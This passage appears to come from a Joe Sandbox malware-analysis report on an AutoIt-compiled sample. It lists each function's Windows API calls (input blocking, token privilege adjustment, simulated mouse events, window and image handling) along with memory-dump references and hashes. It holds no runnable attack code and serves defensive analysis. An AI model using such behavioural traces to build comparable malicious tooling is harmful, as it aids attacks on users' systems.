                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6595df7d5b1e8b1b7b747ccac53119649406c55792ee1b4c0de4b173eb0ae3a0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 05e5ec9343cf19f18cf55a23fcbe356fa09dabe8dc0ad09dc806c478e04b79cd
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6595df7d5b1e8b1b7b747ccac53119649406c55792ee1b4c0de4b173eb0ae3a0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF0E5307102296AE7206676AC4DFEB766DEFC5761F000176F905D2281DAF09944C6B0
                                                                                                                                                                                                                                                                                                                            Function 00231A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00231B48), ref: 00231A20
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00231B48), ref: 00231A35
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 02a00237f76779ba5cee880a2b5ac526307830a0750ed95822454b1fab62f5d2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f6d2fb7ca3ebd35a6a27ce129449dc2c4219cb0ef97642170d22c3b38d3454f0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02a00237f76779ba5cee880a2b5ac526307830a0750ed95822454b1fab62f5d2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE04F72018615AFE7262B11FC09F7277E9EB08311F24881DF59580471DBA2ACA0DB10
                                                                                                                                                                                                                                                                                                                            Function 0024F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0024F51A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 97063eb006a2e186cadb9cfb5ce152a1487a5cc64ed729f3148526da515f7c07
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef877aaf93693e894a96bc51b2986ba8eda6b706f647b306dff5e253eff2b9c7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97063eb006a2e186cadb9cfb5ce152a1487a5cc64ed729f3148526da515f7c07
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE048316102059FC754AF69E504957F7DCAFA4761F008426F849C7351D7B0F940CBD1
                                                                                                                                                                                                                                                                                                                            Function 0023EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0023EC95
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2434400541-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: eecc504360454be2e9ae466588590aa5cb36429002dcb66ff3f0773a84eddf23
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4902c453e73fe648f5e66353dcde2000c76190e371c6772d991c707b641d20a5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eecc504360454be2e9ae466588590aa5cb36429002dcb66ff3f0773a84eddf23
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9D017F61B0202A9EC190E3C9B2FE3A090AA302741F866B4BF122D55D5E4C1A92C9121
                                                                                                                                                                                                                                                                                                                            Function 001F0D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,001F075E), ref: 001F0D4A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4067232ea58fa91b1eff686c1a20048d958cc7280d5b37ae1b4c1af10f6454bc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c99bbad6ec1cba711622fa8235458088eb9c8d74dea16346a57ac620ec084d9d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4067232ea58fa91b1eff686c1a20048d958cc7280d5b37ae1b4c1af10f6454bc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                            Function 0025353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0025358D
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002535A0
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 002535AF
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 002535CA
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 002535D1
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00253700
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0025370E
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253755
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00253761
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0025379D
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537BF
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537D2
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537DD
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 002537E6
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002537F5
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002537FE
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253805
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00253810
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253822
                                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00270C04,00000000), ref: 00253838
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00253848
                                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0025386E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0025388D
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002538AF
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00253A9C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 919610e54a185192dec5d545f45eaa4af3f8b245328a796bb25d6bcf299018a4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2f4d75ebfac7fde691f4d87ac1cfd8e0e34c1ea6f5164ba275a4f28997db096d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 919610e54a185192dec5d545f45eaa4af3f8b245328a796bb25d6bcf299018a4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F027971A10209EFDB14DF64DC8DEAE7BB9EF49311F008558F915AB2A0CBB4AD05CB64
                                                                                                                                                                                                                                                                                                                            Function 001D1625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?), ref: 001D16B4
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00212B07
                                                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00212B40
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00212F85
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D1488,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 001D1865
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053), ref: 00212FC1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00212FD8
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00212FEE
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00212FF9
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                                            • String ID: 0$(*$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2760611726-2353856374
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 69ab286c0fbdb69c93495ba0b525380235c353f26459ad25b15c819ff4970b26
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b05a5375ddcef630b4950c464c68880665e734583be8b4caecd8ab85d2efda9a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69ab286c0fbdb69c93495ba0b525380235c353f26459ad25b15c819ff4970b26
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F112E230610212EFC725CF14D848BAAB7F5FB65300F18852AF5559B661CB71ECAACF91
                                                                                                                                                                                                                                                                                                                            Function 00267B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00267B67
                                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00267B98
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00267BA4
                                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00267BBE
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00267BCD
                                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00267BF8
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 00267C00
                                                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00267C07
                                                                                                                                                                                                                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00267C16
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00267C1D
                                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00267C68
                                                                                                                                                                                                                                                                                                                            • FillRect.USER32(?,?,?), ref: 00267C9A
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00267CBC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(00000012), ref: 00267E5B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SetTextColor.GDI32(?,00267B2D), ref: 00267E5F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColorBrush.USER32(0000000F), ref: 00267E75
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(0000000F), ref: 00267E80
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetSysColor.USER32(00000011), ref: 00267E9D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00267EAB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SelectObject.GDI32(?,00000000), ref: 00267EBC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SetBkColor.GDI32(?,?), ref: 00267EC5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: SelectObject.GDI32(?,?), ref: 00267ED2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00267EF1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00267F08
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00267E22: GetWindowLongW.USER32(?,000000F0), ref: 00267F15
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 41dd9f686acc0ac70d5aac58e5151f92863df9d1bd352a2c6afb0d9a94e52a3e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d5623f3e4462944090c7172381e62ae0c3d5108a8b96bd66e247f9a1973a793c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41dd9f686acc0ac70d5aac58e5151f92863df9d1bd352a2c6afb0d9a94e52a3e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AA1CF71518306AFCB009F64EC4CE6BBBA9FF49324F104A19F962961E0D7B1D884CF51
                                                                                                                                                                                                                                                                                                                            Function 0025316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0025319B
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002532C7
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00253306
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00253316
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0025335D
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00253369
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002533B2
                                                                                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002533C1
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 002533D1
                                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002533D5
                                                                                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002533E5
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002533EE
                                                                                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 002533F7
                                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00253423
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0025343A
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0025347A
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0025348E
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0025349F
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002534D4
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 002534DF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002534EA
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002534F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2012914c09d7257581326c9a2c6f09071cfb355fc65aacfb7b56a501534d5dff
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bc6c2df5e7cbdd5242ad3330110a7c8beff718db868219f7ec1176ac53c962a4
